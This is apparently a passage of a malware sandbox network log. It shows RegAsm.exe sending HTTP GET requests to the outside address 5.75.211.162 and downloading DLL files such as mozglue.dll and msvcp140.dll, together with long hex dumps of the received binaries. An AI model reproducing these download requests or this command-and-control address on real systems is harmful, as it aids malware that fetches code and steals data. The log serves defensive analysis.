0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
2024-09-26 22:28:44 UTC	16384	IN	Data Raw: 0e 81 e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
2024-09-26 22:28:44 UTC	16384	IN	Data Raw: 00 00 c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f Data Ascii: EEPZ}EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@w,0w
2024-09-26 22:28:44 UTC	16384	IN	Data Raw: 04 8d 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
2024-09-26 22:28:44 UTC	16384	IN	Data Raw: 7d 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff Data Ascii: }eUeLXee0@eeeue0UEeeUeee $
2024-09-26 22:28:44 UTC	16384	IN	Data Raw: 38 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 Data Ascii: 8O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEE
2024-09-26 22:28:44 UTC	16384	IN	Data Raw: 1c c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 Data Ascii: ,0<48%8A)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	57888	5.75.211.162	443	7032	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:28:45 UTC	196	OUT	GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:28:46 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:28:45 GMT Content-Type: application/octet-stream Content-Length: 608080 Connection: close Last-Modified: Thursday, 26-Sep-2024 22:28:45 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 22:28:46 UTC	16122	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
2024-09-26 22:28:46 UTC	16384	IN	Data Raw: c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 Data Ascii: #H1A$P~#HbA$P~#HUVuF\|FlNhFdFhFTNP
2024-09-26 22:28:46 UTC	16384	IN	Data Raw: ff 8b 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
2024-09-26 22:28:46 UTC	16384	IN	Data Raw: 06 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 Data Ascii: )0LY)0LZ\|!i(0C}L8!i(0u9Gu)0E8)0}L
2024-09-26 22:28:46 UTC	16384	IN	Data Raw: 83 c4 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 Data Ascii: EN1B]zB\|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
2024-09-26 22:28:46 UTC	16384	IN	Data Raw: 42 fd ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc Data Ascii: BH) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
2024-09-26 22:28:46 UTC	16384	IN	Data Raw: 00 00 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F\|$4rD$ D$ WVjjPS,VL$4
2024-09-26 22:28:46 UTC	16384	IN	Data Raw: 8b b8 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c Data Ascii: D$4P<\|$\$t@)GD$ P08z.Jt_@u`\|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<
2024-09-26 22:28:46 UTC	16384	IN	Data Raw: 83 e1 fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
2024-09-26 22:28:46 UTC	16384	IN	Data Raw: b9 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	57890	5.75.211.162	443	7032	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:28:47 UTC	197	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:28:48 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:28:47 GMT Content-Type: application/octet-stream Content-Length: 450024 Connection: close Last-Modified: Thursday, 26-Sep-2024 22:28:47 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 22:28:48 UTC	16122	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
2024-09-26 22:28:48 UTC	16384	IN	Data Raw: 72 00 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d Data Ascii: r-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnm
2024-09-26 22:28:48 UTC	16384	IN	Data Raw: 00 00 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff Data Ascii: x{\|L@DX}0}}M@4}0}}4M@tXM}0}}XM
2024-09-26 22:28:48 UTC	16384	IN	Data Raw: d9 00 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u\|_E^UQQMuU]EDB]ED{nt]B]E
